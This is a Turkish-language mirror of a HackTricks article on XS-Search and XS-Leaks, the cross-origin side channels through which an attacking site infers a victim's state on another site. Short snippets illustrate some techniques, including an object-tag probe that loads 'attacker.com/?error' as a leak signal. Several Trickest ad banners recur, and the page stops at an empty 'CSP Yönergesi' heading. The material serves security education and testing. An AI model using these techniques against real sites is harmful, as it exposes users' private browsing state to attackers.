Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search.md

88 KiB
Raw Blame History

XS-Arama/XS-Sızıntıları

Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Sıfırdan Kahraman'a AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

Temel Bilgiler

XS-Arama, yan kanal zafiyetlerinden yararlanarak çapraz kökenli bilgileri çıkarmak için kullanılan bir yöntemdir.

Bu saldırıda yer alan ana bileşenler şunlardır:

  • Zararlı Web: Bilgilerin çıkarılması amaçlanan hedef web sitesi.
  • Saldırganın Web'i: Saldırgan tarafından oluşturulan zararlı web sitesi, kurbanın ziyaret ettiği ve saldırıyı barındıran site.
  • Dahil Etme Yöntemi: Zararlı Web'i Saldırganın Web'ine dahil etmek için kullanılan teknik (örneğin, window.open, iframe, fetch, href ile HTML etiketi vb.).
  • Sızıntı Tekniği: Dahil etme yöntemi aracılığıyla elde edilen bilgilere dayanarak Zararlı Web'in durumu arasındaki farkları ayırt etmek için kullanılan teknikler.
  • Durumlar: Saldırganın ayırt etmeyi amaçladığı Zararlı Web'in iki potansiyel durumu.
  • Algılanabilir Farklar: Saldırganın, Zararlı Web'in durumunu çıkarmak için güvendiği gözlemlenebilir farklar.

Algılanabilir Farklar

Zararlı Web'in durumlarını ayırt etmek için birkaç yön incelenebilir:

  • Durum Kodu: Çeşitli HTTP yanıt durum kodları arasındaki farkı ayırt etmek, sunucu hataları, istemci hataları veya kimlik doğrulama hataları gibi çapraz kökenli durum kodları.
  • API Kullanımı: Sayfalar arasında Web API'lerinin kullanımını tanımlamak, çapraz kökenli bir sayfanın belirli bir JavaScript Web API'sini kullanıp kullanmadığını ortaya çıkarabilir.
  • Yönlendirmeler: Yalnızca HTTP yönlendirmeler değil, aynı zamanda JavaScript veya HTML tarafından tetiklenen farklı sayfalara yönlendirmeleri tespit etmek.
  • Sayfa İçeriği: HTTP yanıt gövdesindeki değişiklikleri veya sayfa alt kaynaklarında, örneğin yerleştirilmiş çerçevelerin sayısı veya görüntülerdeki boyut farklılıklarını gözlemlemek.
  • HTTP Başlığı: Belirli bir HTTP yanıt başlığının varlığını veya değerini belirlemek, X-Frame-Options, Content-Disposition ve Cross-Origin-Resource-Policy gibi başlıklar gibi başlıkları içerebilir.
  • Zamanlama: İki durum arasındaki tutarlı zaman farklarını fark etmek.

Dahil Etme Yöntemleri

  • HTML Elemanları: HTML, stil sayfaları, görüntüler veya betikler gibi çapraz kökenli kaynakları dahil etmek için çeşitli elemanlar sunar, tarayıcının bir HTML olmayan kaynağı istemesini zorunlu kılar. Bu amaçla potansiyel HTML elemanlarının derlemesi https://github.com/cure53/HTTPLeaks adresinde bulunabilir.
  • Çerçeveler: iframe, object ve embed gibi elemanlar, HTML kaynaklarını doğrudan saldırganın sayfasına gömebilir. Sayfanın çerçeve koruması olmadığında, JavaScript, çerçevelenmiş kaynağın window nesnesine contentWindow özelliği aracılığıyla erişebilir.
  • ılır Pencereler: window.open yöntemi, bir kaynağı yeni bir sekmede veya pencerede açarak, JavaScript'in SOP'u takip ederek yöntemlere ve özelliklere etkileşimde bulunmasını sağlar. Sıkça tek oturum açma işlemlerinde kullanılan açılır pencereler, hedef kaynağın çerçeveleme ve çerez kısıtlamalarını atlar. Ancak modern tarayıcılar açılır pencerelerin oluşturulmasını belirli kullanıcı eylemlerine sınırlar.
  • JavaScript İstekleri: JavaScript, XMLHttpRequests veya Fetch API kullanarak hedef kaynaklara doğrudan istekler yapılmasına izin verir. Bu yöntemler, HTTP yönlendirmelerini takip etmeyi seçmek gibi isteği üzerinde hassas kontrol sağlar.

Sızıntı Teknikleri

  • Olay İşleyici: XS-Sızıntılarda klasik bir sızıntı tekniği olan olay işleyicileri, onload ve onerror gibi olay işleyicileri, kaynak yükleme başarısı veya başarısızlığı hakkında bilgi sağlar.
  • Hata Mesajları: JavaScript istisnaları veya özel hata sayfaları, hata mesajından doğrudan bilgi sağlayabilir veya varlığının ve yokluğunun farklılaştırılması yoluyla sızıntı bilgisi sağlayabilir.
  • Global Sınırlar: Tarayıcının fiziksel sınırları, bellek kapasitesi veya diğer zorunlu tarayıcı sınırları, bir eşiğe ulaşıldığında sızıntı tekniği olarak hizmet edebilir.
  • Global Durum: Tarayıcıların global durumlarıyla (örneğin, Geçmiş arabirimi) algılanabilir etkileşimler, sözgelimi tarayıcının geçmişindeki giriş sayısı, çapraz kökenli sayfalar hakkında ipuçları sağlayabilir.
  • Performans API'si: Bu API, mevcut sayfanın performans detaylarını sağlar, belge ve yüklenen kaynaklar için ağ zamanlamasını içerir, istenen kaynaklar hakkında çıkarımlar yapmayı sağlar.
  • Okunabilir Öznitelikler: Bazı HTML öznitelikleri çapraz kökenli okunabilir ve sızıntı tekniği olarak kullanılabilir. Örneğin, window.frame.length özelliği, JavaScript'in bir web sayfasındaki dahil edilen çerçeveleri saymasına olanak tanır.

XSinator Aracı ve Makale

XSinator, kağıdında açıklanan çeşitli bilinen XS-Sızıntılarına karşı tarayıcıları kontrol etmek için otomatik bir araçtır: https://xsinator.com/paper.pdf

Araça https://xsinator.com/ adresinden erişebilirsiniz.

{% hint style="warning" %} Dışlanmış XS-Sızıntıları: Diğer XSinator sızıntılarıyla çakışacağından hizmet işçilerine dayanan XS-Sızıntıları hariç bırakmak zorunda kaldık. Ayrıca, belirli bir web uygulamasındaki yanlış yapılandırmalar ve hatalara dayanan XS-Sızıntılarını hariç bırakmayı tercih ettik. Örneğin, Cross-Origin Resource Sharing (CORS) yanlı yapılandırmaları, postMessage sızıntısı veya Cross-Site Scripting. Ayrıca, genellikle yavaş, gürültülü ve doğru olmayan zaman tabanlı XS-Sızıntıları hariç bıraktık. {% endhint %}

Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Zaman Tabanlı Teknikler

Aşağıdaki tekniklerden bazıları, web sayfalarının olası durumlarındaki farklılıkları tespit etmek için süreyi kullanacak. Bir web tarayıcısında zamanı ölçmenin farklı yolları vardır.

Saatler: performance.now() API, geliştiricilere yüksek çözünürlüklü zaman ölçümleri almak için olanak tanır.
Saldırganların kullanabileceği birçok API vardır: Broadcast Channel API, Message Channel API, requestAnimationFrame, setTimeout, CSS animasyonları ve diğerleri.
Daha fazla bilgi için: https://xsleaks.dev/docs/attacks/timing-attacks/clocks.

Olay İşleyici Teknikleri

Onload/Onerror

{% content-ref url="xs-search/cookie-bomb-+-onerror-xs-leak.md" %} cookie-bomb-+-onerror-xs-leak.md {% endcontent-ref %}

Kod örneği, JS'den script nesneleri yüklemeyi dener, ancak diğer etiketler de kullanılabilir, örneğin nesneler, stil sayfaları, resimler, sesler. Ayrıca, etiketi doğrudan enjekte etmek ve onload ve onerror olaylarını etiketin içine (JS'den enjekte etmek yerine) bildirmek de mümkündür.

Bu saldırının ayrıca bir script olmayan versiyonu da bulunmaktadır:

<object data="//example.com/404">
<object data="//attacker.com/?error"></object>
</object>

Bu durumda, example.com/404 bulunamadığında attacker.com/?error yüklenecektir.

Onload Zamanlama

{% content-ref url="xs-search/performance.now-example.md" %} performance.now-example.md {% endcontent-ref %}

Onload Zamanlama + Zorunlu Ağır Görev

Bu teknik, öncekine benzerdir, ancak saldırgan ayrıca cevap olumlu veya olumsuz olduğunda bazı eylemleri ilgili bir süre alacak şekilde zorlar ve o süreyi ölçer.

{% content-ref url="xs-search/performance.now-+-force-heavy-task.md" %} performance.now-+-force-heavy-task.md {% endcontent-ref %}

unload/beforeunload Zamanlama

Bir kaynağı almanın ne kadar zaman aldığı, unload ve beforeunload etkinliklerini kullanarak ölçülebilir. beforeunload etkinliği tarayıcının yeni bir sayfaya geçmeye hazırlandığında ateşlenirken, unload etkinliği navigasyon gerçekleştiğinde meydana gelir. Bu iki etkinlik arasındaki zaman farkı, tarayıcının kaynağı alırken harcadığı süreyi belirlemek için hesaplanabilir.

Kumlanmış Çerçeve Zamanlama + onload

Framing Protections olmadığında, bir sayfa ve alt kaynaklarının ağ üzerinden yüklenmesi için gereken süre bir saldırgan tarafından ölçülebilir. Bu ölçüm genellikle, bir iframe'in onload işleyicisinin, kaynak yükleme ve JavaScript yürütmesinin tamamlanmasından sonra tetiklendiği için mümkündür. Betik yürütme tarafından tanıtılan değişkenliği atlatmak için bir saldırgan, <iframe> içinde sandbox özniteliğini kullanabilir. Bu özniteliğin eklenmesi, JavaScript'in yürütülmesini kısıtlayarak, özellikle ağ performansı tarafından etkilenen bir ölçümü kolaylaştırır.

// Example of an iframe with the sandbox attribute
<iframe src="example.html" sandbox></iframe>

#ID + hata + onload

  • Dahil Etme Yöntemleri: Frames
  • Algılanabilir Fark: Sayfa İçeriği
  • Daha fazla bilgi:
  • Özet: Sayfa doğru içeriğe erişildiğinde hata almayı ve herhangi bir içeriğe erişildiğinde doğru şekilde yüklenmeyi sağlayabilirseniz, tüm bilgileri zaman ölçmeden çıkarmak için bir döngü oluşturabilirsiniz.
  • Kod Örneği:

Varsayalım ki gizli içeriğe sahip sayfayı bir Iframe içine yerleştirebiliyorsunuz.

Kurbanın "bayrak" içeren dosyayı aramasını sağlayabilirsiniz bir Iframe kullanarak (örneğin CSRF'yi sömürerek). Iframe içinde onload olayının her zaman en az bir kez gerçekleştirileceğini biliyorsunuz. Sonra, URL'yi değiştirerek iframe'nin URL'sindeki yapışkan içeriği değiştirerek iframe'nin URL'sini değiştirebilirsiniz.

Örneğin:

  1. URL1: www.saldırgan.com/xssearch#deneme1
  2. URL2: www.saldırgan.com/xssearch#deneme2

Eğer ilk URL başarılı bir şekilde yüklendi ise, URL'nin yapışkan kısmını değiştirdiğinizde onload olayı tekrar tetiklenmeyecek. Ancak eğer sayfa yüklenirken bir tür hata varsa, o zaman onload olayı tekrar tetiklenecektir.

Böylece, doğru yüklenmiş bir sayfa ile bir hata içeren sayfa arasında ayırım yapabilirsiniz.

Javascript Yürütme

  • Dahil Etme Yöntemleri: Frames
  • Algılanabilir Fark: Sayfa İçeriği
  • Daha fazla bilgi:
  • Özet: Eğer sayfa duyarlı içeriği döndürüyorsa veya kullanıcı tarafından kontrol edilebilecek bir içerik. Kullanıcı geçerli JS kodunu negatif durumda ayarlayabilir ve her denemeyi <script> etiketleri içinde yükle, böylece negatif durumlarda saldırganların kodu yürütülür, ve olumlu durumlarda hiçbir şey yürütülmez.
  • Kod Örneği:

{% content-ref url="xs-search/javascript-execution-xs-leak.md" %} javascript-execution-xs-leak.md {% endcontent-ref %}

CORB - Onerror

  • Dahil Etme Yöntemleri: HTML Elemanları
  • Algılanabilir Fark: Durum Kodu ve Başlıklar
  • Daha fazla bilgi: https://xsleaks.dev/docs/attacks/browser-features/corb/
  • Özet: Cross-Origin Read Blocking (CORB), web sayfalarının belirli hassas çapraz kökenli kaynakları yüklemesini önleyen bir güvenlik önlemidir ve Spectre gibi saldırılara karşı koruma sağlar. Ancak, saldırganlar koruyucu davranışını sömürebilir. CORB'a tabi bir yanıt, nosniff ile korunan bir Content-Type ve bir 2xx durum kodu ile döndüğünde, CORB yanıtın gövdesini ve başlıklarını sıyırır. Bu durumu gözlemleyen saldırganlar, başarı veya hata gösteren durum kodu ve CORB tarafından korunduğunu belirten Content-Type'ın kombinasyonunu çıkarabilir, potansiyel bilgi sızıntısına yol açabilir.
  • Kod Örneği:

Saldırı hakkında daha fazla bilgi için daha fazla bilgi bağlantısını kontrol edin.

onblur

Bir iframe içine bir sayfa yüklemek ve sayfanın elementine odaklanmak için #id_değerini kullanabilirsiniz, sonra bir onblur sinyali tetiklendiğinde, ID öğesi varsa.
Aynı saldırıyı portal etiketleri ile gerçekleştirebilirsiniz.

postMessage Yayınları

  • Dahil Etme Yöntemleri: Frames, Açılır Pencereler
  • Algılanabilir Fark: API Kullanımı
  • Daha fazla bilgi: https://xsleaks.dev/docs/attacks/postmessage-broadcasts/
  • Özet: Bir postMessage'dan hassas bilgileri toplamak veya postMessage'ın varlığını bir orak olarak kullanarak kullanıcının sayfadaki durumunu bilmek.
  • Kod Örneği: Tüm postMessage'ları dinleyen herhangi bir kod.

Uygulamalar genellikle farklı kökenler arasında iletişim kurmak için postMessage yayınları kullanır. Ancak, targetOrigin parametresinin doğru şekilde belirtilmediği durumlarda bu yöntem yanlışlıkla hassas bilgileri açığa çıkarabilir, mesajları almak için herhangi bir pencerenin izin verilmesine izin verebilir. Ayrıca, bir mesaj almanın sadece bir orak olarak hareket edebileceğini unutmayın; örneğin, belirli mesajlar yalnızca oturum açmış kullanıcılara gönderilebilir. Bu nedenle, bu mesajların varlığı veya yokluğu, kullanıcının durumu veya kimliği hakkında bilgi açığa çıkarabilir, örneğin oturum açmış olup olmadıkları gibi.

Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Global Sınırlar Teknikleri

WebSocket API

Hedef sayfanın kaç WebSocket bağlantısı kullandığını ve nasıl kullandığını belirlemek mümkündür. Bu, bir saldırganın uygulama durumlarını tespit etmesine ve WebSocket bağlantılarının sayısıyla ilişkili bilgileri sızdırmasına olanak tanır.

Bir köken maksimum miktarda WebSocket bağlantı nesnesini kullandığında, bağlantıların durumundan bağımsız olarak, yeni nesnelerin oluşturulması JavaScript istisnalarına neden olur. Bu saldırıyı gerçekleştirmek için, saldırgan web sitesi hedef web sitesini bir açılır pencerede veya iframe içinde açar ve hedef web sitesi yüklendikten sonra, mümkün olan en fazla WebSocket bağlantısını oluşturmaya çalışır. Atılan istisnaların sayısı, hedef web sitesi penceresi tarafından kullanılan WebSocket bağlantılarının sayısıdır.

Ödeme API

Bu XS-Leak, bir saldırganın çapraz kökenli bir sayfanın bir ödeme isteği başlattığını algılamasına olanak tanır.

Çünkü yalnızca bir ödeme isteğinin aynı anda etkin olabileceği için, hedef web sitesi Ödeme İsteği API'sını kullanıyorsa, bu API'yi kullanmaya yönelik diğer girişimler başarısız olacak ve bir JavaScript istisnasına neden olacaktır. Saldırgan, bu durumu söz konusu olduğunda düzenli aralıklarla Ödeme API arayüzünü göstermeye çalışarak sömürebilir. Bir deneme istisna oluşturursa, hedef web sitesi şu anda bunu kullanıyor demektir. Saldırgan, bu düzenli denemeleri hemen arayüzü oluşturduktan sonra kapatılarak gizleyebilir.

Olay Döngüsünün Zamanlaması

{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}

JavaScript, tek iplikli bir olay döngüsü eşzamanlılık modelinde çalışır, bu da yalnızca bir görevi aynı anda yürütebileceği anlamına gelir. Bu özellik, farklı kökenden gelen kodun ne kadar sürede yürütüldüğünü ölçmek için sömürülebilir. Bir saldırgan, kendi kodunun olay döngüsündeki yürütme süresini sürekli olarak sabit özelliklere sahip olaylar göndererek ölçebilir. Bu olaylar, olay havuzu boş olduğunda işlenecektir. Diğer kökenlerin de aynı havuza olaylar gönderdiği durumda, bir saldırgan, kendi görevlerinin yürütülmesindeki gecikmeleri gözlemleyerek dış olayların yürütülme süresini çıkarabilir. Bu gecikmeleri izlemek için olay döngüsünü izleme yöntemi, farklı kökenlerden gelen kodun yürütme süresini ortaya çıkarabilir ve hassas bilgileri ortaya çıkarabilir.

{% hint style="warning" %} Bir yürütme zamanlamasında ağ faktörlerini ortadan kaldırmak ve daha kesin ölçümler elde etmek mümkündür. Örneğin, sayfayı yüklemeden önce sayfada kullanılan kaynakları yükleyerek. {% endhint %}

Meşgul Olay Döngüsü

  • Dahil Etme Yöntemleri:

  • Algılanabilir Fark: Zamanlama (Genellikle Sayfa İçeriği, Durum Kodu nedeniyle)

  • Daha Fazla Bilgi: https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop

  • Özet: Bir web işleminin yürütme süresini ölçmenin bir yolu, bir ipliğin olay döngüsünü kasıtlı olarak engelleyip ardından olay döngüsünün tekrar erişilebilir hale gelmesinin ne kadar sürdüğünü zamanlamaktır. Bir bloke etme işlemi (uzun bir hesaplama veya senkron API çağrısı gibi) olay döngüsüne ekleyerek ve ardından sonraki kodun yürütmesinin ne kadar sürdüğünü izleyerek, olay döngüsü sırasında yürütülen görevlerin süresini çıkarabiliriz. Bu teknik, JavaScript'in olay döngüsünün tek iplikli doğasından yararlanır, burada görevler sıralı olarak yürütülür ve aynı ipliği paylaşan diğer işlemlerin performansı veya davranışı hakkında bilgi sağlayabilir.

  • Kod Örneği:

Olay döngüsünü kilitleyerek yürütme süresini ölçme tekniğinin önemli bir avantajı, Site İzolasyonu'nu atlatma potansiyeline sahip olmasıdır. Site İzolasyonu, farklı web sitelerini ayrı işlemlere ayıran ve kötü niyetli sitelerin doğrudan diğer sitelerden hassas verilere erişmesini engellemeyi amaçlayan bir güvenlik özelliğidir. Ancak, başka bir kökenin yürütme zamanlamasını paylaşılan olay döngüsü aracılığıyla etkileyerek, bir saldırgan, o kökenin etkinlikleri hakkında dolaylı olarak bilgi çıkarabilir. Bu yöntem, diğer kökenin verilerine doğrudan erişime dayanmaz, ancak o kökenin etkinliklerinin paylaşılan olay döngüsü üzerindeki etkisini gözlemleyerek, Site İzolasyonu tarafından oluşturulan koruyucu engellerden kaçınır.

{% hint style="warning" %} Bir yürütme zamanlamasında ağ faktörlerini ortadan kaldırmak ve daha kesin ölçümler elde etmek mümkündür. Örneğin, sayfayı yüklemeden önce sayfada kullanılan kaynakları yükleyerek. {% endhint %}

Bağlantı Havuzu

  • Dahil Etme Yöntemleri: JavaScript İstekleri
  • Algılanabilir Fark: Zamanlama (Genellikle Sayfa İçeriği, Durum Kodu nedeniyle)
  • Daha Fazla Bilgi: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
  • Özet: Bir saldırgan, tüm soketleri kilitler, hedef web sayfasını yükler ve aynı anda başka bir sayfayı yükler; son sayfanın yüklenmeye başlaması hedef sayfanın yüklenme süresidir.
  • Kod Örneği:

{% content-ref url="xs-search/connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}

Tarayıcılar sunucu iletişimi için soketleri kullanır, ancak işletim sistemi ve donanımın sınırlı kaynakları nedeniyle, tarayıcıların eşzamanlı soket sayısına bir sınır koymak zorunda kaldığı bilinmektedir. Saldırganlar bu sınırlamayı aşağıdaki adımlarla sömürebilir:

  1. Tarayıcının soket sınırını belirleyin, örneğin, 256 global soket.
  2. Bağlantıları tamamlamadan açık tutacak şekilde farklı ana bilgisayarlara 255 istek başlatarak 255 soketi uzun süre işgal edin.
    1. soketi hedef sayfaya bir istek göndermek için kullanın.
  4. Farklı bir ana bilgisayara 257. isteği göndermeye çalışın. Tüm soketlerin kullanımda olduğu (2. ve 3. adımlara göre) varsayıldığında, bu istek bir soket kullanılabilir hale gelene kadar sıraya alınacaktır. Bu isteğin devam etmeden önceki gecikme, saldırgana 256. soketle ilgili ağ etkinliği hakkında zamanlama bilgisi sağlar. Bu çıkarım, 2. adımdaki 255 soketin hala meşgul olduğunu ve herhangi yeni bir soketin 3. adımdan serbest bırakılan soket olması gerektiğini ima ettiğinden mümkündür. 256. soketin kullanılabilir hale gelme süresi, dolayısıyla hedef sayfaya yapılan isteğin tamamlanması için gereken süre ile doğrudan ilişkilidir.

Daha fazla bilgi için: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/

Performans API Teknikleri

Performans API, web uygulamalarının performans metriklerine dair içgörüler sunar ve bu içgörüler Resource Timing API tarafından daha da zenginleştirilir. Resource Timing API, ağ isteği zamanlamalarının detaylı izlenmesini sağlar, örneğin isteklerin süresini. Sunucuların yanıtlarında Timing-Allow-Origin: * başlığını içerdiğinde, transfer boyutu ve alan arama süresi gibi ek veriler erişilebilir hale gelir.

Bu zengin veri, performance.getEntries veya performance.getEntriesByName gibi yöntemler aracılığıyla alınabilir, performansla ilgili bilgilerin kapsamlı bir görünümünü sağlar. Ayrıca, API, performance.now() ile elde edilen zaman damgaları arasındaki farkı hesaplayarak yürütme sürelerinin ölçülmesini kolaylaştırır. Ancak, belirli işlemler için Chrome gibi tarayıcılarda performance.now()'un hassasiyeti milisaniyelere sınırlı olabilir, bu da zamanlama ölçümlerinin ayrıntısını etkileyebilir.

Zamanlama ölçümlerinin ötesinde, Performans API, güvenlikle ilgili içgörüler için de kullanılabilir. Örneğin, Chrome'da performance nesnesinde sayfaların varlığı veya yokluğu, X-Frame-Options'ın uygulanıp uygulanmadığını gösterebilir. Özellikle, bir sayfa X-Frame-Options nedeniyle bir çerçevede oluşturulmaktan engellendiğinde, bu sayfa performance nesnesinde kaydedilmez, sayfanın çerçeve politikaları hakkında ince bir ipucu sağlar.

Hata Sızıntısı

Bir isteğin hata ile sonuçlanması durumunda bir performans girdisi oluşturulmaz, bu nedenle HTTP yanıt durum kodları arasında fark yapılabilir.

Stil Yeniden Yükleme Hatası

Önceki teknikte, GC'deki tarayıcı hatalarının yüklenemeyen kaynakların iki kez yüklendiği iki durum belirlendi. Bu, Performans API'da birden fazla giriş oluşturur ve bu nedenle algılanabilir.

İstek Birleştirme Hatası

Teknik, belirtilen makalede bir tabloda bulundu ancak teknikle ilgili bir açıklama bulunamadı. Bununla birlikte, bu tekniği kontrol eden kaynak kodu https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak adresinde bulabilirsiniz.

Boş Sayfa Sızıntısı

Bir saldırgan, bir isteğin boş bir HTTP yanıt gövdesi ile sonuçlandığını tespit edebilir çünkü boş sayfaların bazı tarayıcılarda performans girdisi oluşturmadığını görebilir.

XSS-Auditor Sızıntısı

Güvenlik Bildirimlerinde (SA), XSS Denetleyici, başlangıçta XSS saldırılarını önlemek için tasarlanmış olmasına rağmen, paradoksal bir şekilde hassas bilgilerin sızdırılmasında kullanılabilir. Bu yerleşik özellik Google Chrome (GC) 'dan kaldırıldı, ancak SA'da hala mevcut. 2013 yılında, Braun ve Heiderich, XSS Denetleyicinin yanlışlıkla meşru betikleri engelleyebileceğini ve yanlış pozitiflere yol açabileceğini gösterdi. Buna dayanarak, araştırmacılar, hassas bilgileri çıkarmak ve çapraz kökenli sayfalarda belirli içeriği tespit etmek için teknikler geliştirdiler, bu kavrama Terada tarafından başlangıçta bildirilen ve Heyes tarafından bir blog yazısında ayrıntılı olarak açıklanan XS-Sızıntıları olarak bilinir. Bu teknikler GC'deki XSS Denetleyicisi için özgü olsa da, SA'da, XSS Denetleyicisi tarafından engellenen sayfaların Performans API'da giriş oluşturmadığını keşfedildi, bu da hassas bilgilerin hala sızdırılabileceği bir yöntemi ortaya koydu.

X-Frame Sızıntısı

Bir sayfanın bir iframe içinde görüntülenmesine izin verilmiyorsa, bu sayfa bir performans girdisi oluşturmaz. Sonuç olarak, bir saldırgan yanıt başlığını X-Frame-Options olarak tespit edebilir.
Aynı durum embed etiketi kullanıldığında da geçerlidir.

İndirme Tespiti

Tanımlanan XS-Sızıntıya benzer şekilde, bir kaynak indirildiğinde ContentDisposition başlığı nedeniyle, ayrıca bir performans girdisi oluşturulmaz. Bu teknik tüm büyük tarayıcılarda çalışır.

Yönlendirme Başlangıç Sızıntısı

Bazı tarayıcıların davranışlarını istismar eden bir XS-Leak örneği bulduk. Standart, çapraz kaynak istekleri için belirli özniteliklerin sıfıra ayarlanması gerektiğini tanımlar. Ancak, SA'da, hedef sayfanın yönlendirmesiyle kullanıcının yönlendirilip yönlendirilmediği sorgulanarak Performans API'sini sorgulayarak ve redirectStart zamanlama verilerini kontrol ederek tespit edilebilir.

Süre Yönlendirme Sızıntısı

GC'de, bir yönlendirme ile sonuçlanan isteklerin süresi negatif olur ve bu nedenle yönlendirme olmayan isteklerden ayırt edilebilir.

CORP Sızıntısı

Bazı durumlarda, nextHopProtocol girişi bir sızıntı tekniği olarak kullanılabilir. GC'de, CORP başlığı ayarlandığında, nextHopProtocol boş olacaktır. CORP etkin kaynaklar için SA hiçbir performans girişi oluşturmayacaktır.

Hizmet İşçisi

Hizmet işçileri, bir kökende çalışan olaya dayalı betik bağlamlarıdır. Bir web sayfasının arka planında çalışırlar ve kaynakları ön belleğe almak için araya girebilir, değiştirebilir ve ön belleğe alabilirler ve çevrimdışı web uygulaması oluşturabilirler.
Bir hizmet işçisi tarafından ön belleğe alınan bir kaynak iframe aracılığıyla erişilirse, kaynak hizmet işçisi önbelleğinden yüklenecektir.
Kaynağın hizmet işçisi önbelleğinden yüklendiğini tespit etmek için Performans API kullanılabilir.
Bu ayrıca bir Zamanlama saldırısı ile de yapılabilir (daha fazla bilgi için belgeye bakın).

Önbellek

Performans API kullanılarak bir kaynağın önbelleğe alınıp alınmadığı kontrol edilebilir.

Ağ Süresi

Hata Mesajları Tekniği

Medya Hatası

// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
document.getElementById("log").innerHTML += msg;
}

function startup() {
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";

// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("<strong>Status: " + status + "</strong> (Error code:" + err.code + " / Error Message: " + err.message + ")<br>");
};
audioElement.onerror = errHandler;
}

CORS Hatası

Bu teknik, bir saldırganın Webkit tabanlı tarayıcıların CORS isteklerini nasıl işlediğini sömürerek çapraz kökenli bir sitenin yönlendirmesinin hedefini çıkarmasına olanak tanır. Özellikle, bir CORS etkin istek, kullanıcı durumuna dayalı olarak yönlendirme yapan bir hedef siteye gönderildiğinde ve tarayıcı daha sonra isteği reddettiğinde, hata mesajı içinde yönlendirmenin tam URL'siığa çıkar. Bu zayıflık sadece yönlendirme gerçeğini ortaya çıkarmakla kalmaz, aynı zamanda yönlendirmenin son noktasını ve içerebileceği duyarlı sorgu parametrelerini de açığa çıkarır.

SRI Hatası

Bir saldırgan, ırı detaylı hata mesajlarını kullanarak çapraz kökenli yanıtların boyutunu çıkarmak için SRI mekanizmasını sömürebilir. Bu, Subresource Integrity (SRI) mekanizmasının, genellikle CDN'lerden alınan kaynakların değiştirilmediğini doğrulamak için bütünlük özniteliğini kullandığı gerçeğinden kaynaklanmaktadır. SRI'nin çapraz kökenli kaynaklarda çalışabilmesi için bunların CORS etkin olması gerekir; aksi takdirde bütünlük kontrollerine tabi değillerdir. Güvenlik İddialarında (SA), CORS hatası XS-Leak gibi, bir bütünlük özniteliği taşıyan bir istek başarısız olduğunda bir hata mesajı yakalanabilir. Saldırganlar, herhangi bir isteğin bütünlük özniteliğine sahte bir kripto değeri atayarak bu hatayı kasıtlı olarak tetikleyebilir. SA'da, ortaya çıkan hata mesajı yanlışlıkla istenen kaynağın içerik uzunluğunu ortaya çıkarır. Bu bilgi sızıntısı, bir saldırganın yanıt boyutundaki değişiklikleri ayırt etmesine olanak tanır ve sofistike XS-Leak saldırıları için yol açar.

CSP İhlali/Tespiti

Bir XS-Leak, CSP'yi kullanarak çapraz kökenli bir sitenin farklı bir etki alanına yönlendirilip yönlendirilmediğini tespit edebilir. Bu sızıntı, yönlendirmeyi tespit edebilir, ancak ayrıca yönlendirme hedefinin etki alanı da sızabilir. Bu saldırının temel fikri, saldırgan sitesindeki hedef etki alanına izin vermektir. Bir istek hedef etki alanına gönderildiğinde, çapraz kökenli bir etki alana yönlendirilir. CSP, buna erişimi engeller ve bir sızıntı tekniği olarak kullanılan bir ihlal raporu oluşturur. Tarayıcıya bağlı olarak, bu rapor yönlendirmenin hedef konumunu sızdırabilir.
Modern tarayıcılar, yönlendirildiği URL'yi belirtmeyebilir, ancak hala bir çapraz kökenli yönlendirme tetiklendiğini tespit edebilirsiniz.

Önbellek

Tarayıcılar tüm web siteleri için ortak bir önbellek kullanabilir. Kökenlerinden bağımsız olarak, bir hedef sayfanın belirli bir dosyayı isteyip istemediğini çıkarmak mümkündür.

Bir sayfa yalnızca kullanıcı giriş yaptığında bir resmi yüklüyorsa, kaynağı geçersiz kılabilirsiniz (eğer önbellekteyse artık önbellekte olmaz, daha fazla bilgi için bağlantılara bakın), o kaynağı yükleyebilecek bir istek gerçekleştirin ve kaynağı kötü bir istekle yüklemeye çalışın (örneğin, aşırı uzun bir başvuru başlığı kullanarak). Kaynak yüklemesi herhangi bir hata tetiklemediyse, bu, kaynağın önbelleğe alındığı anlamına gelir.

CSP Yönergesi

